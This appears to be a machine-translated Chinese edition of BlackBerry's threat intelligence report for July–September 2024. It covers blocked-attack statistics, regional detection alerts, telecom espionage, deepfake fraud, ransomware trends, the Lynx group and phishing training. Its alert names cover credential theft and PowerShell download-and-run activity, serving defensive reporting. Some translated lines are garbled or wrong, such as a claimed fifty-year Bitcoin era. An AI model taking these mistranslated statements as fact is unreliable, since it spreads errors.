全球威胁情报报告

2025 年 1 月版

报告期:2024 年 7 月 1 日至 9 月 30 日

重要的可操作情报

本报告全面回顾了全球威胁形势,重点是提供可操作的情报,供领导者用于积极主动地保护组织安全。本报告涵盖 2024 年 7 月至 9 月。

BlackBerry®网络安全解决方案阻止了近 100 万次针对美国客户的攻击,识别出8 万个独特的恶意签名阻止了 43 万次针对商业企业的攻击

阅读《全球网络攻击》,了解更多信息。

在本季度检测到的600,000 次关键基础设施攻击中,45% 针对金融机构

在 "关键基础设施"部分了解我们的网络威胁情报 (CTI) 团队的内部和外部调查结果。

基于 PowerShell 的攻击表明,威胁行为者在保持 NALA、亚太地区和欧洲、中东和非洲地区全球技术一致的同时,也进行了区域调整。

了解我们的MDR 团队分析如何揭示不断演变的地区攻击模式以及基于 PowerShell 的威胁在全球的持续存在。

执法者之光 "部分揭示了勒索软件向有针对性的心理战演变的过程,包括越来越多地将外流数据武器化,以破坏声誉和发挥战略杠杆作用,而不仅仅是获取经济利益。

了解更多有关针对加拿大的勒索软件流行病的信息

 

RansomHub目前拥有包括 LockBit 和 ALPHV 在内的主要附属公司,在 2024 年第三季度检测到的勒索软件操作中占了大多数。

在 "威胁行为者 "和 "工具"下阅读更多内容。

新的勒索软件集团Lynx采用了激进的双重勒索策略(将数据盗窃与加密相结合),并正在从北美和澳大利亚向欧洲市场扩张。

阅读我们的 "流行威胁 "部分,了解所有主要操作系统的趋势性威胁。

我们提供了一份增强型安全协议和应对措施清单,以应对不断演变的勒索软件策略,重点是减少暴露和通信安全。

查看 "风险缓解策略"中的列表。

查找应对 Salt Typhoon重点是关键通信基础设施的保护。

探索保护关键通信基础设施的防御战略

目录

BlackBerry®全球威胁情报报告为 CISO 和决策者提供了重要的洞察力,重点关注与特定行业和地区相关的最新网络安全威胁和挑战。

2024 年,影响网络安全威胁格局的因素众多。全球范围内的重要选举、持续不断的冲突以及因各种争议问题引发的地缘政治紧张局势造成了动荡的环境。这种动荡为全球的恶意行为者和网络威胁组织提供了力量。这些实体利用不确定性和动荡来获取经济利益、开展网络间谍活动、造成伤害或扩大混乱。

全球范围内的网络攻击

黑莓人工智能驱动的网络安全性能

在 2024 年 7 月至 9 月的三个月期间,黑莓的人工智能驱动网络安全解决方案为全球各类客户提供了保护。我们的安全技术挫败了近 200 万次网络攻击,每天记录了超过 3000 个针对我们客户的独特恶意哈希值。

本季度,美国面临的网络攻击数量最多,远远超过其他任何国家。黑莓的网络安全技术阻止了近 100 万次针对美国客户的攻击,其中约 8 万次涉及使用独特的恶意哈希值。

BlackBerry 跟踪这些攻击中使用的独特恶意哈希值的数量与攻击总数的对比。通常,商品或 "现成 "的恶意软件会在更大规模的攻击中被重复使用,从而导致同一二进制文件被多次识别。

独特或新颖的恶意软件通常用于针对性极强的攻击。在这种情况下,威胁方投入大量时间和精力来创建具有特定属性的新恶意软件,旨在通过表面上微小但最终影响巨大的攻击来破坏特定行业、组织或高价值目标(HVT)。亚太地区(APAC)排名第二,欧洲、中东和非洲地区(EMEA)排名第三。

图 1:2024 年 7 月至 9 月每个地区阻止的攻击与唯一哈希值对比。
图 1:2024 年 7 月至 9 月每个地区阻止的攻击与唯一哈希值对比。

在本报告所述期间,BlackBerry 托管检测和响应 (MDR) 团队的分析揭示了威胁活动的独特区域模式。基于 PowerShell 的攻击成为全球一致的威胁,Base64 编码执行出现在所有地区的前五次检测中 - 在 NALA 地区排名第一,在亚太地区排名第五,在欧洲、中东和非洲地区排名第三。

每个地区还呈现出独特的威胁特征:

  • NALA 发现大量系统工具被滥用,其中最受关注的是更名后的 Sysinternals 工具和 LOLBAS(脱离土地的二进制文件和脚本)外壳。
  • 亚太地区面临着大量的凭证盗窃企图和防御规避行为,尤其是针对 Windows Defender 的攻击。
  • 欧洲、中东和非洲地区显示出多种攻击模式,从 PowerShell 下载命令到用户账户操纵。

网络攻击模式的这种地区差异表明,威胁行为者正在根据地区因素调整其方法,同时在全球范围内保持一些一致的技术。

图 2:按地区分列的五大CylanceMDR 警报。

NALA

第 1 次可疑的 Base64 编码 PowerShell 执行
第 2 次可能运行了重命名的 Sysinternals 工具
第 3 次:服务启动了 LOLBAS shell
第 4 次:执行远程访问工具执行远程访问工具
第 5 次执行 PowerShell 下载命令

亚太地区

第 1 次可能盗用 Windows 凭据
第 2 次: Svchost 计划任务启动 Rundll32
第 3 次通过 PowerShell 篡改 Windows Defender
第 4 次可能通过 DLL 加载滥用 Msiexec
第 5 次可疑的 Base64 编码 PowerShell 执行

欧洲、中东和非洲地区

第 1 次执行 PowerShell 下载命令
第 2 个可能滥用 stdout 命令行
第 3 次可疑的 Base64 编码 PowerShell 执行
第 4 个通过 Net 本地组添加创建用户帐户
第 5 页Svchost 计划任务启动 Rundll32

地缘政治分析与评论

十多年前,时任美国国防部长的莱昂-帕内塔(Leon Panetta)曾警告可能会发生 "网络珍珠港事件",强调美国的关键基础设施可能会受到严重的网络攻击,并将波及整个网络物理世界。虽然他的可怕警告尚未成为现实,但我们对容易受到攻击、利用和操纵的数字技术的依赖却在不断增加。一些人将我们数字化社会所面临的困境形容为 "魔鬼交易",即为了经济增长、提高生产力和便利而损害安全

十年前,能够实施复杂网络攻击的主要国家行为者屈指可数。如今,国家和非国家行为者多达数百个。加拿大政府最新发布的《国家网络威胁评估报告》以及英国等其他盟国的网络威胁评估报告都指出,网络不安全状况越来越难以预测,越来越多咄咄逼人的威胁参与者正在采用新技术和新策略来改进和扩大其恶意活动。

这种扩散的影响无处不在。根据全球反诈骗联盟(Global Anti-Scam Alliance)的估计,到 2023 年,全球将有 25.5% 的人口受到网络诈骗的影响。在英国,超过 70% 的大中型企业和近 66% 的高收入慈善机构都遭遇过某种形式的网络安全漏洞。在加拿大,超过三分之二(70%)的加拿大人在过去一年中遭遇过网络安全事件。黑莓自己的分析证实了这些趋势,并强调了针对关键基础设施的网络攻击的增加。

勒索软件被普遍认为是最具破坏性的网络犯罪形式,人们越来越担心 "勒索软件可能使国家而不仅仅是公司陷入瘫痪"事实上,针对医疗保健行业等关键基础设施的勒索软件攻击正在大幅上升。在美国,卫生与公众服务部报告称,2018 年至 2022 年间,涉及医院勒索软件的大型数据泄露事件增加了 278%。而且,随着勒索软件攻击数量的激增,勒索软件行为者所使用的战术和技术也多种多样。勒索软件团伙现在采用多方面的勒索策略,包括渗出和加密受害者数据,同时还在暗网上维护数据泄漏网站,发布从不法受害者那里窃取的数据。犯罪网络正变得日益复杂。

挑战不仅仅是技术上的。令人担忧的现实是,网络犯罪活动正在对人类福祉产生负面影响。据研究人员记录,勒索软件攻击医院后,院内死亡率增加了 35% 至 41%。其他研究强调了勒索软件攻击如何对邻近的急诊部门产生连带影响,造成严重的业务中断,并对救护车到达时间、治疗等待时间和病人护理产生负面影响。

另一个令人担忧的趋势是出现了与网络犯罪有关的人口贩运行业。根据联合国的记录,2023 年东南亚约有 22 万人被贩运到网络犯罪活动中。这些人面临生命威胁,遭受酷刑和残忍、不人道和有辱人格的待遇或处罚、任意拘留、性暴力、强迫劳动和其他形式的剥削。十多年来,有组织犯罪集团一直在柬埔寨境外开展此类活动,并已扩展至缅甸、泰国、老挝和菲律宾等其他国家。在某些情况下,人们被从巴西和东非贩运到东南亚的这些强迫网络犯罪活动地点。

随着网络威胁的扩散,各国政府和业界正在努力破坏勒索软件生态系统,并加强我们阻止恶意网络行为者的集体能力。2024 年 10 月,黑莓和加拿大公共安全局同意共同担任国际反勒索软件倡议(CRI)公私部门顾问小组主席。黑莓与 CRI 的 68 个成员国一起,致力于加强集体抵御勒索软件的能力,使世界各国政府能够更好地应对勒索软件和其他网络相关威胁的威胁。

图 3:2024 年 4 月至 6 月与 2024 年 7 月至 9 月关键基础设施和商业企业的攻击和独特哈希值分布。

各行业的网络攻击情况

BlackBerry 分析师从全球视角转向特定行业,确定了威胁行为者的主要目标。在本报告中,行业部门分为两大类: 关键基础设施商业企业.

黑莓在网络安全和基础设施安全局(CISA)定义的 16 个行业领域收集关键基础设施客户的遥测数据和统计资料。这些行业包括医疗保健、政府、能源、金融和国防。商业企业是指从事商品和服务的生产、分销或销售的企业。这些企业在制造业、零售业和服务业等多个领域开展业务。下图 3 显示了关键基础设施和商业企业的攻击分布和独特哈希值。

图 3:2024 年 4 月至 6 月与 2024 年 7 月至 9 月关键基础设施和商业企业的攻击和独特哈希值分布。

关键基础设施威胁

对于网络犯罪分子来说,关键基础设施可能是一个有利可图的目标。这些行业所拥有的宝贵数据经常在地下市场出售,用于策划未来的攻击或利用这些数据进行间谍活动。最近,针对医疗保健、能源、金融和国防等关键基础设施行业的攻击激增。对于这些行业的组织来说,停机时间代价高昂。由于停机和无法访问关键数据可能会给他们及其客户带来损失,因此他们更有可能支付赎金以迅速恢复系统。

随着越来越多的服务被数字化,越来越多的系统被连接到互联网上,这些行业的组织经常发现自己处于网络犯罪分子的攻击范围之内。这些犯罪集团既有寻求同行认可的新手黑客,也有有组织的民族国家威胁行为者,还有试图给敌人造成混乱的老牌勒索软件集团。这些攻击的影响可能是毁灭性的,会影响国家安全,扰乱基本运作,危及经济稳定甚至人的生命。

黑莓网络安全解决方案,包括 CylanceENDPOINT™ 在本季度挫败了近 600,000 次针对关键基础设施的攻击,其中 45% 的攻击以金融行业为目标。金融业仍然是网络攻击者青睐的目标。

图 4:按关键基础设施部门分列的攻击和独特哈希值。
图 4:按关键基础设施部门分列的攻击和独特哈希值。
在下一部分中,我们将仔细分析本季度遇到的一些对关键基础设施最普遍的威胁。第一部分列出了黑莓在其客户群中最常识别和防范的威胁类型。第二部分涉及第三方(如行业新闻出版物、安全供应商或政府机构)报告的威胁。
图 5:本季度黑莓内部威胁在关键基础设施中的分布。

商业企业威胁

商业企业行业横跨资本货物、零售和批发贸易等领域,是复杂网络攻击的主要目标。成功的入侵可能会导致网络受损、数据丢失、运营中断、声誉受损和巨大的经济损失。

本季度,BlackBerry 网络安全解决方案阻止了超过 43 万次针对商业企业业务的攻击。下图显示了收到最多攻击企图和独特恶意软件哈希值的行业。

图 6:商业企业行业中受阻攻击和唯一哈希值的分布。
图 6:商业企业行业中受阻攻击和唯一哈希值的分布。
图 7:2024 年 7 月至 9 月商业企业面临的最大内部威胁。
图 7:2024 年 7 月至 9 月商业企业面临的最大内部威胁。

通信安全:威胁与缓解措施

由于现代电信基础设施几乎被普遍使用,它现在面临着前所未有的一系列针对其基本操作和数据流的复杂威胁。从进行大规模间谍活动的民族国家行为者到提供 "拦截即服务 "的网络犯罪企业,这些威胁利用了各国公共电信网络在全球连通性和安全性之间固有的权衡。

随着企业越来越依赖移动和数字通信来开展敏感业务,这些网络的安全漏洞已成为关键漏洞,有可能暴露竞争优势、战略计划和机密信息。最近一连串的电信供应商漏洞事件表明,任何组织都不能仅仅因为使用了标准的运营商服务,就认为自己的通信是安全的。

本季度早些时候,美国电话电报公司(AT&T)披露了一起重大安全漏洞事件,威胁者在较长时间内泄露了其手机用户的通话和短信记录;我们现在知道,有多个电信组织被渗透。一些美国领导人称其为 "我国历史上最严重的电信漏洞"。AT&T 的泄密事件意义重大,因为它不仅影响到 AT&T 的用户,还影响到全球任何在受影响期间与 AT&T 客户进行过通信的人。被泄露的数据包括有潜在价值的元数据,涉及通信模式、通话时间和用户之间的关系。

在本节中,我们将探讨威胁通信基础设施的各类实体、它们使用的策略以及组织为保护数据可以采取的缓解措施。

 

威胁行动者

民族国家行为者对国际电信安全构成重大威胁,最近与中国政府有关联的攻击者开展了大规模网络间谍活动就是明证。这些老练的攻击者以主要电信公司为目标,获取包括美国总统候选人在内的知名人士的手机数据。

美国政府官员认为,一个名为Salt Typhoon 的威胁行为者与中国国家安全部关系密切,是电信渗透活动的幕后黑手。他们的行动影响了包括 Verizon、AT&T 和 T-Mobile 在内的多家主要运营商,调查人员发现他们在这些网络中潜伏了一年多仍未被发现

随着时间的推移,犯罪实体已发展到在电信部门提供高度专业化的攻击服务。其中包括提供 "呼叫拦截即服务 "和运营 "窃听即服务 "平台的组织,其服务可在互联网上随时购买。一些威胁行为者已开发出在终端用户不知情的情况下重定向和拦截任何电话号码的手机连接的能力。

电信部门还面临着来自对手的威胁,他们试图通过利用通信手段获取优势。这些行为者以高知名度的个人和组织为目标,利用截获的数据进行勒索或暴露机密关系,以破坏公众对目标个人的信任。尤其令人担忧的是,他们有能力识别并可能暴露那些试图避开公众视线的政治候选人的高调支持者,或那些人身安全依赖于匿名的个人,如记者、新闻记者和政治活动家。

已查明的威胁

电信网络固有的漏洞可能会使组织面临复杂的互连威胁网络。虽然公共电信网络在提供全球可及性方面表现出色,但这种可及性伴随着恶意行为者可以(而且经常)利用的安全权衡。

从直接通信拦截到复杂的元数据分析,这些威胁不仅针对通信内容,还针对通信所揭示的模式和关系。最近发生在主要电信供应商身上的泄密事件表明,这些威胁不仅仅是理论上的,而是对雇主与雇员之间的保密性、竞争优势甚至国家安全构成了严重威胁。其中一些风险包括

通信拦截: 威胁行为者可以拦截音频/视频通话和短信,从而实时窃听通信内容。这些漏洞给标准电话带来的许多风险也存在于用于语音通话和短信的免费应用程序中。

元数据开发: 通过元数据开发,威胁行动者收集并分析通话详细记录 (CDR) 和信息详细记录 (MDR)。这些数据使他们能够构建详细的联系关系图,并分析包括频率、时间和通话时长在内的通信模式。对这些元数据的实时可见性使威胁行动者能够跟踪单个电信用户并识别可利用的通信模式。

黑莓威胁研究和情报副总裁 Ismael Valenzuela 解释说:"电信元数据可能是网络犯罪分子的金矿。即使通话和短信内容没有被泄露,但这些通话背后的背景知识,如一个人给谁打电话、通话频率和时间,都可以很容易地被武器化。威胁行动者可以大概知道你住在哪里、在哪里工作、最常和谁通话,甚至知道你是否拨打过任何潜在的敏感号码,如医疗保健提供商。

基于身份的攻击: 公共网络中缺乏身份验证,使得身份和电话号码欺骗成为普遍现象,几乎无法防范。威胁者可以利用窃取的元数据,通过欺骗已经与之通信的号码,专门针对电信用户实施攻击。那些接听电话的人很可能会接到骚扰电话,但在某些情况下,攻击者可能会使用深层语音生成器等新技术来设计复杂的身份诈骗。

使用生成式人工智能克隆真人的声音被称为音频深度伪造。这类攻击在企业界迅速发展,因为攻击者实际上依赖于员工对熟人(如老板)声音的信任,并滥用这种信任实施高额金融诈骗。

基础设施的脆弱性: 现代电信基础设施面临着特别严峻的挑战。要解决这些问题,往往需要全面更换系统组件,这可能会导致服务中断,并需要电信供应商投入大量资金。

  • 传统系统组件:电信主干网的关键部分仍然使用 20 世纪 70 年代和 80 年代的系统,这些系统在现代网络安全保护措施出现之前就已存在,并且主要是为固定电话业务设计的。为了升级这些老旧组件,使其符合当前的安全措施,需要通过安全中继网络进行通信路由,并实施端到端加密,以保护数据内容及其传输模式。
  • 网络接入点:运营商互联的蜂窝漫游协议存在固有的弱点,允许恶意行为者重定向和拦截蜂窝连接。包括 AT&T、Verizon 和 T-Mobile 在内的所有主要运营商都存在这一漏洞,正如Salt Typhoon 成功利用多个供应商的网络节点所证明的那样。
  • 认证系统: 一些关键电信基础设施组件明显缺乏多因素身份验证等基本安全控制。这一缺陷使得威胁行为者在初次进入时就能保持持续访问。
  • 监控系统:专为合法监控行动设计的 "合法拦截 "基础设施可能会遭到破坏,从而泄露有关正在进行的调查和监控目标的敏感行动数据。
  • 数据中转站: 互联网服务提供商和电信网络之间的互联产生了更多的漏洞点,未加密的电子邮件和其他通信都有可能被截获。
  • 全球路由基础设施: 电信网络的基本设计将全球连接性置于安全之上,从而在提供商之间和跨地区的电话和数据路由方式上造成固有的漏洞。

情报收集: 电信漏洞极大地帮助了威胁行动者的情报收集能力。威胁行动者可以利用泄露的信息对特定用户进行实时监控,并在某些情况下识别隐藏的关系。在政治活动中,这种监视使他们能够发现试图维护隐私和暴露机密关系的高调支持者。这种情报可以揭示更多的通信模式,这些模式也可能以意想不到的方式被利用。

"巴伦苏埃拉补充说:"你可能觉得自己没有任何攻击者想要的东西,但只要知道你最常给谁打电话,知道你最有可能信任谁并因此接听谁的电话,网络犯罪分子就能更容易地实施众多电话诈骗中的任何一种,包括那些依靠深度伪造音频来欺骗你认识的人的声音的诈骗。

二次威胁: 利用电信漏洞可能会导致次生威胁。这些威胁包括勒索企图,特别是当保密关系暴露时。此外,被泄露的信息还可用于竞争情报收集和间谍活动。如果高知名度的个人、实体或组织受到威胁,甚至会影响民主进程并威胁国家安全。

黑莓公司副总裁大卫-怀斯曼(David Wiseman)表示 SecuSUITE®认为,"无论是在市场上还是在战场上,具有竞争优势的秘密都很容易暴露。公共电信网络主要是为可访问性而设计的,这往往会导致安全隐患"。

包括加密信息平台在内的公共网络的一个重要问题是其开放性,几乎任何人都可以加入。怀斯曼解释说:"在 Signal 或 WhatsApp 等平台上,用户可以自行注册,这就造成了身份欺骗、欺诈和深度伪造等问题。自我注册的开放系统本身就是高风险的。

缓解措施

为了应对不断变化的电信威胁,企业必须实施全面的安全措施,而不仅仅是基本的加密。虽然消费级通信工具可提供一定程度的保护,但它们无法应对针对信息内容和元数据的复杂攻击。

有效的防御需要多层次的方法,将技术解决方案与战略协议和人员警惕性结合起来。以下战略为各组织提供了一个框架,以保护其敏感通信免受民族国家行为体、犯罪实体和其他试图利用电信漏洞的威胁行为体的攻击。

身份验证和身份验证: 多因素身份验证(MFA)和身份验证协议是防范未经授权访问和社交工程攻击的关键第一道防线。

  • 策略:实施强大的身份验证系统,同时培训用户通过其他或辅助渠道验证意外通信。
  • 举例说明:当高管在正常工作时间之外收到董事会成员的紧急信息,并提出不同寻常的要求时,他们会按照协议,通过事先建立的单独沟通渠道进行核实。

链接和信息安全: 社会工程攻击利用人们对熟悉电话号码和信息来源的信任来传播恶意内容。

  • 策略:制定严格的链接处理协议,并实施在发送前扫描和验证信息内容的系统。
  • 举例说明:一家银行机构对外部链接实施了禁止点击政策,要求所有重要通信都在自己的安全平台内进行。

基础设施控制: 组织需要对其通信渠道进行全面监督,以防止未经授权的访问并维护安全标准。

  • 策略:部署通信系统,由组织对基础设施、用户授权和安全协议进行全面控制。
  • 举例说明:一家国防承包商实施了一套闭环通信系统,所有用户必须事先获得授权,所有通信都通过受监控的安全渠道进行。

元数据保护: 即使信息内容是安全的,通信模式和元数据也可能泄露敏感信息。

  • 策略: 加密和隧道传输所有元数据,包括呼叫者信息、通信时长和用户之间的关系模式。
  • 举例说明:一家金融机构不仅要对通信进行加密,还要对高管之间的通信模式进行加密,以防止竞争对手摸清他们的合并讨论情况。

增强移动安全: 移动通信带来了独特的安全挑战,需要专门的加密解决方案。

  • 策略:对所有移动通信实施经认证的加密验证,以防止呼叫欺骗、欺诈和未经授权的访问。
  • 举例说明:某政府机构部署了具有内置加密身份验证功能的移动设备,确保所有通信无论在何处都能得到验证和安全。

数据生命周期控制: 传统的通信系统一旦共享数据,就会放弃对数据的控制,造成永久性的安全漏洞。

  • 策略:保持组织对所有共享数据的所有权,并能随时撤销访问权限或删除内容。
  • 举例说明:当一位高管离开一家财富 100 强企业时,企业会立即取消对所有以前共享文档和通信的访问权限。

社会工程防御: 人类的基本行为往往是通信系统中最大的安全漏洞。

  • 策略:在自动系统的支持下,实施全面的培训计划,以检测和防止社交工程企图。
  • 举例说明:某组织的安全通信平台会自动标记任何异常通信模式或请求,并要求进行额外验证。

风险评估一体化: 安全措施必须符合特定的组织风险和监管要求。

  • 策略:定期评估通信安全风险,并根据新出现的威胁和合规需求调整协议。
  • 举例说明:一家医疗服务提供商每季度对其通信安全措施进行一次评估,并根据新的威胁情报和监管变化更新协议。

整体安全整合: 必须将通信安全纳入更广泛的网络安全战略。

  • 策略:确保安全通信与其他安全措施和协议协同工作。
  • 实例:一家制造企业将其安全通信平台与访问控制和数据丢失防护系统整合在一起,创建了一个统一的安全生态系统。

临时数据架构: 持久数据存储会增加漏洞和未经授权访问的可能性。

  • 策略:实施通过临时存储和自动清除协议最大限度减少数据持久性的系统。
  • 举例说明:一家法律公司的通信平台在确认向所有授权收件人发送信息后,会立即自动从服务器中删除信息。

阅读我们的博客,进一步了解威胁行为者如何使用和滥用从移动通信中窃取的元数据。

深度伪造的危险

美国联邦调查局(FBI)最近发布了一份警告,称网络犯罪分子利用人工智能生成技术实施大规模欺诈,针对商业企业和金融组织精心设计骗局。该警告称,深度伪造视频和语音通话以及人工智能生成的个人资料图像可能会被用于雇佣诈骗,例如朝鲜利用间谍冒充远程工人渗透西方 IT 公司的活动。

这种新近扩大的网络攻击范围对各种规模的商业企业都是一个非常现实的威胁,预计到 2027 年损失将达到惊人的 400 亿美元。正如黑莓公司产品工程和数据科学高级副总裁 Shiladitya Sircar 最近在 Daniel Miessler 的无监督学习播客中解释的那样:"这种生成式人工智能对手利用所有这些多模态信息创造了新的攻击载体,而这些攻击载体是无人能预见到的。它创造了一个更复杂、更细微的威胁环境,优先考虑身份驱动型攻击,而且只会越来越好。"

这对企业的影响是深远的。当利益相关者无法再信任高管通信的真实性时,从市场动向公告到内部战略指令,业务的方方面面都会受到影响。银行和金融服务部门已成为主要目标,在维护安全通信和交易验证流程方面面临前所未有的挑战。正如 Sircar 所说:"这些深度伪造最令人担忧的方面是有可能削弱信任--对合法、真实系统的信任。

具有前瞻性思维的企业已经在新出现的监管要求前做好了准备,包括美国的《禁止人工智能欺诈法案》和加拿大关于非自愿媒体的立法。这些监管方面的发展预示着企业必须在通信安全和身份验证方面做出重大转变。

随着深度语音和生成式人工智能语音篡改软件的改进,这些工具很可能会在越来越多的针对性攻击中被更频繁地使用。如果您想了解有关深度伪造的更多信息,包括可以用来帮助保护您的组织的缓解措施,可以在这里下载我们关于深度伪造的白皮书,或在无监督学习播客中收听我们与 Shiladitya Sircar 的完整讨论

如果您认为自己是深度伪造欺诈骗局的受害者,可以向联邦调查局互联网犯罪投诉中心(www.ic3.gov)举报。

执法风采

黑莓公司与世界各地的执法机构合作,加强网络安全方面的公私合作。从《2024 年 9 月全球威胁情报报告》开始,黑莓开始与加拿大皇家骑警国家网络犯罪协调中心(NC3)合作,共享情报。以下信息由 NC3 提供,旨在从执法角度强调网络犯罪趋势。
执法风采

历史背景:勒索软件集团的崛起

自 1989 年首次发布艾滋病木马攻击记录以来,勒索软件生态系统已经发生了重大演变。在 2010 年加密货币出现之前,勒索软件的演变是渐进的。然而,比特币时代刺激了网络威胁的快速增长,尤其是在过去的 50 年里。

2019 年,MAZERyukSodinokibi/REvil等组织通过加密计算机系统和网络并要求支付解密密钥,造成了严重破坏。这在当时是一种有效的攻击策略,因为很少有组织会维护系统备份,更少的组织会制定网络事件响应计划。

 

不断演变的勒索软件威胁

在此期间,人们对勒索软件操作的看法与传统的有组织犯罪集团很相似:技术娴熟的网络罪犯为了共同的事业或目的走到一起。从那时起,勒索软件团伙已成为适应性很强的对手,而且随着网络安全实践的改进,勒索软件操作员的战术、技术和程序(TTP)也在不断改进。

为了确保经济收益,勒索软件团伙从单一勒索(仅对数据加密)转向双重勒索策略,除了要求支付解密密钥的赎金外,还要求防止被盗数据在暗网上出售。

勒索软件业务的数量也在稳步增长,老的勒索软件团伙改头换面,新的勒索软件团伙进入生态系统,新的商业模式不断涌现。勒索软件即服务(RaaS)以及更快的加密方法、更好的混淆技术和针对多种操作系统的能力是过去几年中取得的一些显著进步。

虽然有些勒索软件继续对文件和系统进行加密,但也有一些勒索软件选择放弃这一步骤,转而采用只进行渗透的模式。这种方法的改变很可能是对采用更好的网络安全实践以及更多地使用系统备份和灾难恢复服务的一种回应。

勒索的第三个要素

最近,勒索软件行动又增加了第三个勒索要素。与仅仅窃取数据并威胁将其发布到网上不同的是,一些勒索软件正在花时间分析窃取的数据,并将其武器化,以增加对拒绝付款的受害者的压力。这种策略可能涉及共享目标首席执行官和企业主的详细联系方式或"诽谤 "其家庭成员,以及威胁向当局报告在被盗数据中发现的任何有关非法商业活动的信息。如果不满足赎金要求,勒索软件操作员可能会威胁联系客户或顾客,甚至发动更多攻击。

此外,NC3 还出现了大量新的勒索软件变种。勒索软件生态系统似乎由不同的个人组成,他们的技能组合包括社会工程学、初始访问中介、高级加密、恶意软件开发、谈判甚至公共关系。勒索软件生态系统是一个复杂的互连网络。打击勒索软件的运行需要同样复杂的多学科方法。

执法挑战

对于执法部门来说,勒索软件领域的持续演变是一个巨大的挑战,需要创新的解决方案。勒索软件是全球最大的威胁,只要受害者继续支付,勒索软件就可能持续存在。

从之前执法部门对HiveBlackCatLockBit 等知名勒索软件组织的打击中,我们了解到勒索软件行为者可以迅速调整策略,以挫败执法部门的努力。这些适应性调整使勒索软件生态系统变得支离破碎,迫使执法部门采取多方面的策略,包括创造性地破坏运行(如针对基础设施、声誉和信任)。

加拿大十大勒索软件威胁

国家网络犯罪协调中心(NC3)与国内和国际执法部门、政府合作伙伴、私营企业和学术界密切合作,不断改进加拿大针对网络犯罪的执法对策。除了促进和支持具体的网络犯罪执法行动外,国家网络犯罪协调中心还定期监测网络威胁环境的变化,并对以加拿大为目标的勒索软件运营商进行三年一次的评估。这一系统性评估向网络安全行业通报了网络犯罪生态系统的变化,并有助于引导调查资源。

下表追踪了 2024 年 5 月至 8 月报告期内加拿大最流行的勒索软件威胁,该报告期与本报告期重叠。

图 8:加拿大勒索软件威胁,2024 年 5 月至 8 月。
图 8:加拿大勒索软件威胁,2024 年 5 月至 8 月。

新兴群体聚焦 - Lynx 勒索软件

Lynx勒索软件集团于 2024 年 7 月首次出现在威胁环境中,并在随后几个月内迅速积累了超过 25 名受害者。目标组织遍布各行各业,主要分布在北美和欧洲。

什么是凌云集团?

与当今许多勒索软件运营商一样,Lynx 集团使用双重勒索策略。在非法访问系统或网络后,他们首先会流出敏感数据,然后对其进行加密,使所有者无法访问。然后,他们威胁说,如果不支付赎金,就会公开发布数据。当一个组织被 Lynx 入侵时,该组织会在泄密网站上发布一篇博文--可通过公共互联网或暗网访问,有时也可同时访问--"点名羞辱 "受害者。

图 9:Lynx 暗网泄漏网站的屏幕截图。
图 9:Lynx 暗网泄漏网站的屏幕截图。
在赎金谈判中,该组织可能会进一步利用窃取的数据,威胁说如果受害者不满足额外的赎金要求,就会公布更多信息。

Lynx 瞄准的行业和地区

在下面的图片中,您可以看到 Lynx 在哪些地区和行业比较流行。凌云主要针对北美和澳大利亚的组织,但也包括英国和欧洲部分地区
Lynx 瞄准的行业和地区
图 10:山猫受害者的地理分布。
图 11:Lynx 的主要目标行业。

山猫如何运作

Lynx 同时拥有一个表面网站和一个深层网络泄密网站,以及一系列位于".onion "地址的镜像网站--据推测,这是为了确保在执法部门将其网站下线时的正常运行时间。他们还使用自己的加密器,经黑莓研究人员仔细检查,该加密器似乎与臭名昭著的 INC Ransom 组织使用的加密器采用了相同的代码库

迄今为止,已在野外发现了少量与 Lynx 组织使用的加密器有关的样本。所有样本似乎都是用 C++ 编写的,缺乏任何形式的包装或混淆以阻碍分析。

一旦实现了加密前的目标,如获得初始访问权和数据外渗,勒索软件就会被部署到受害者的环境中。勒索软件本身设计为通过命令行控制台执行,支持多个可选参数。这使得攻击者可以自定义文件加密方法,以实现其目标。

执行时,该恶意软件还支持"--verbose "模式,可打印勒索软件动态运行时的操作列表。

山猫如何运作
图 12:Lynx 加密器在冗余模式下运行。

为了防止受害者的设备无法运行,恶意软件会省略某些文件类型和 Windows 文件夹的加密。这样做有两个目的,一是加快加密速度,二是防止重要的 Windows 程序无法访问,因为这将使设备 "变砖",破坏该组织勒索赎金的机会。

有关这一新兴威胁的详细分析,请阅读我们关于 Lynx 的完整报告。

运行安全措施

定期的安全意识培训对于培养警觉的组织文化至关重要。应重点关注网络钓鱼防范、凭证安全和远程访问安全等主题。

  • 策略:实施 "发现红旗 "培训计划,员工会收到包含常见欺骗要素的模拟网络钓鱼电子邮件,随后会收到解释每个可疑指标的即时教育反馈。跟踪员工的回复率,并根据个人绩效指标提供有针对性的后续培训。
  • 实例:一家国际零售商通过启动全面的培训计划和强大的补丁管理系统来及时处理漏洞,从而大大减少了网络钓鱼事件。
  • 只需一名员工点击恶意链接,就会危及组织的系统和基础设施。下面是一个网络钓鱼信息示例,供您在培训中参考。
图 13a:员工可能收到的典型连接请求。
图 13a:员工可能收到的典型连接请求。
然而,仔细观察就会发现钓鱼邮件的典型特征(图 13b):
图 13b:网络钓鱼电子邮件中应注意的红色标记。
图 13b:网络钓鱼电子邮件中应注意的红色标记。
  1. 发件人的电子邮件地址声称来自 "linkedincdn.com",而不是 LinkedIn.com 官方域名--这是一种典型的域名欺骗技术。
  2. 有一个警告标语显示这是来自外部的信息。这是一个有用的安全功能,许多组织都会选择实施。
  3. 这条信息使用了两种经典的社交工程策略。它声称自己来自目标组织的高层管理人员(CISO),并使用奉承("久仰您的大名")来鼓励目标参与。
  4. 副本的格式不统一:拼写和语法不规范的地方随处可见。
  5. 虽然个人资料照片让人觉得是真实的,但任何人只要知道如何右击并选择 "图片另存为",就能轻易地从合法的个人资料上复制这些照片。
  6. 这封邮件的整体外观模仿了社交媒体网站向用户发送的常见自动邮件。
    • 接受 "和 "查看个人资料 "按钮很可能是恶意链接,可能会导致凭证收集页面或恶意软件下载。
    • 底部的 "退订 "链接也可能是恶意的。网络钓鱼者通常会加入这些链接,使其看起来合法,但实际上会将用户引向更多有害内容。

帮助员工学会

  • 仔细核实发件人的电子邮件域名。
  • 对不请自来的连接请求,尤其是来自高层管理人员的请求,要保持怀疑。
  • 切勿点击可疑电子邮件中的按钮或链接,而应直接在浏览器中输入 URL 访问引用的网站。
  • 注意电子邮件系统发出的安全警告。
  • 要警惕意外的职业网络请求中的奉承或急迫性。

网络犯罪分子不断改进他们的网络攻击,以增强其影响力。为了抵御这些不断变化的威胁,企业必须采取前瞻性的网络安全防御策略。这包括对安全监控、员工培训和事件响应等技术进行战略性投资,以确保为应对复杂的网络威胁做好准备。

网络故事亮点:土狼 "银行木马以拉丁美洲为目标,重点攻击巴西金融机构

